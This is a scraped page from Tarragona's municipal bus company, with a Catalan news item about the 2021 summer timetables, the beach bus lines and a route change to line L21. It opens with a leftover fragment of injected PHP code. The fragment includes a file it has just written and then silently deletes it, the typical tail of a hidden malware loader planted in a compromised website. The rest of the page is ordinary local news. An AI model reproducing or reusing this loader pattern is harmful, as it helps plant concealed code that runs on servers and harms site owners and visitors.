");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> L'EMT de Tarragona posa en funcionament els horaris d'estiu
Iconos cabecera

Highlights

  • T-12 CardT-12 Card
    For boys and girls from 4 to 12 years old

L'EMT de Tarragona posa en funcionament els horaris d'estiu (28/06/2021)

Des de dijous 24 de juny els autobusos de l’Empresa Municipal de Transports (EMT) circulen amb els horaris d’estiu. Com cada any, Sant Joan dóna el tret de sortida a la temporada de platges. Es modifiquen els horaris d’algunes línies i s’adapta el servei a les necessitats de mobilitat de la població, que varien amb la finalització del curs acadèmic.

A més, i com en altres anys, es posen en funcionament les línies específiques amb direcció a les platges:

L16: Pont i Gol – Platges
L161: Bonavista – Platja Arrabassada
L162: St. Salvador, SP i SP – Platja Arrabassada

Segons el president de l’EMT, Jordi Fortuny, “un any més garantim l’accessibilitat a les platges tant del centre com dels barris de la ciutat. És important subratllar, però, que cal utilitzar el servei públic de transport amb seny. L’aforament dels autobusos és del 100% però caldrà utilitzar la mascareta a l’interior dels vehicles”.


Modificació del recorregut de la L21

Per altra banda, i com es va informar fa uns dies, a partir d’ara la L21 que fa el recorregut circular “Estació” incorpora la nova parada “Dissuasiu Cementiri” a la rotonda del Camí del Llorito.

El recorregut de la L21, que baixava pel Passeig Torroja, s’amplia anant fins aquesta rotonda per tal de donar un millor servei a usuaris de l’aparcament dissuasiu de Sant Pau i facilitar la mobilitat als veïns del Camí del Llorito. El recorregut de la línia continua fins al Cap Muralles, recuperant el trajecte anterior a l’Avinguda Maria Cristina.

Font: Ajuntament de Tarragona

[Back to news]

 
Anselm Clavé, 1 43004 - Tarragona